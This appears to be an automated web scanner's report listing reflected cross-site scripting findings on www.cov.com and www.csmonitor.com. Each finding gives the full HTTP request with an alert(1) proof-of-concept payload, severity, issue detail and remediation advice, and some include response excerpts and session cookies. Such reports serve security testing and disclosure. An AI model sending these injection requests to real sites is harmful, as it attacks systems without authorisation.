GET /legalnotices?a0792'-alert(1)-'83d5d12175f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.84. http://www.cov.com/mclarty [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /mclarty
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 354a9'-alert(1)-'6c85014edb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mclarty?354a9'-alert(1)-'6c85014edb2=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.85. http://www.cov.com/news/detail.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /news/detail.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b350e'-alert(1)-'c5433843e1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/detail.aspx?b350e'-alert(1)-'c5433843e1a=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.86. http://www.cov.com/news/detail.aspx [news parameter]
Issue detail
The value of the news request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eb11'-alert(1)-'81ed8e1df91 was submitted in the news parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/detail.aspx?news=15409eb11'-alert(1)-'81ed8e1df91 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.87. http://www.cov.com/newsandevents [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /newsandevents
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f75a8'-alert(1)-'99f649b592f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsandevents?f75a8'-alert(1)-'99f649b592f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.88. http://www.cov.com/offices [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /offices
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c98b'-alert(1)-'fd3b25fecf2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /offices?2c98b'-alert(1)-'fd3b25fecf2=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.89. http://www.cov.com/practice [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /practice
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4da1'-alert(1)-'610b8b730dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /practice?f4da1'-alert(1)-'610b8b730dc=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.90. http://www.cov.com/practice/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /practice/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c53e5'-alert(1)-'9529b8f7a51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.91. http://www.cov.com/privacypolicy [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /privacypolicy
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df5e0'-alert(1)-'cd34e2cebf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacypolicy?df5e0'-alert(1)-'cd34e2cebf=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.92. http://www.cov.com/probonooverview [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /probonooverview
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb241'-alert(1)-'14889ea6214 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /probonooverview?eb241'-alert(1)-'14889ea6214=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.93. http://www.cov.com/publications [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /publications
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37aa1'-alert(1)-'7b6396f21de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /publications?37aa1'-alert(1)-'7b6396f21de=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.94. http://www.cov.com/recruitingthebestandbrightest [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /recruitingthebestandbrightest
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c57c0'-alert(1)-'7612bb35499 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /recruitingthebestandbrightest?c57c0'-alert(1)-'7612bb35499=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title id="ctl00_htmlTitle">Covington & Burling LLP | Diversity | Recruiting the Best & Brightest</title> ...[SNIP]... ecruitingthebestandbrightest/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/recruitingthebestandbrightest/Diversity.aspx?c57c0'-alert(1)-'7612bb35499=1';//]]> ...[SNIP]...
4.95. http://www.cov.com/retainingourdiversetalent [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /retainingourdiversetalent
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c13f'-alert(1)-'a38ede21cf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /retainingourdiversetalent?1c13f'-alert(1)-'a38ede21cf4=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title id="ctl00_htmlTitle">Covington & Burling LLP | Diversity | Retaining Our Diverse Talent</title>
...[SNIP]... on = '/retainingourdiversetalent/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/retainingourdiversetalent/Diversity.aspx?1c13f'-alert(1)-'a38ede21cf4=1';//]]> ...[SNIP]...
4.96. http://www.cov.com/sitemap [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /sitemap
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6862'-alert(1)-'2791e98804b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap?a6862'-alert(1)-'2791e98804b=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.97. http://www.cov.com/termsofuse [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /termsofuse
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce89f'-alert(1)-'5ebc528209d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /termsofuse?ce89f'-alert(1)-'5ebc528209d=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1edc1"-alert(1)-"8a5e635d48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /USA1edc1"-alert(1)-"8a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Wed, 19 Jan 2011 15:47:57 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Thu, 20 Jan 2011 15:47:57 GMT
Date: Wed, 19 Jan 2011 15:47:57 GMT
Content-Length: 22010
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53b36"-alert(1)-"11f428f14f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /USA/Justice53b36"-alert(1)-"11f428f14f7/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Wed, 19 Jan 2011 15:48:02 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Thu, 20 Jan 2011 15:48:03 GMT
Date: Wed, 19 Jan 2011 15:48:03 GMT
Content-Length: 22012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10b9d"-alert(1)-"77d9442451f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /USA/Justice/201110b9d"-alert(1)-"77d9442451f/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Wed, 19 Jan 2011 15:48:08 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Thu, 20 Jan 2011 15:48:08 GMT
Date: Wed, 19 Jan 2011 15:48:08 GMT
Content-Length: 22012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 133fa"-alert(1)-"9a2b6004857 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /USA/Justice/2011/0118133fa"-alert(1)-"9a2b6004857/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Wed, 19 Jan 2011 15:48:15 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Thu, 20 Jan 2011 15:48:15 GMT
Date: Wed, 19 Jan 2011 15:48:15 GMT
Content-Length: 22012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12fdc"-alert(1)-"b91d9019faa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law12fdc"-alert(1)-"b91d9019faa HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
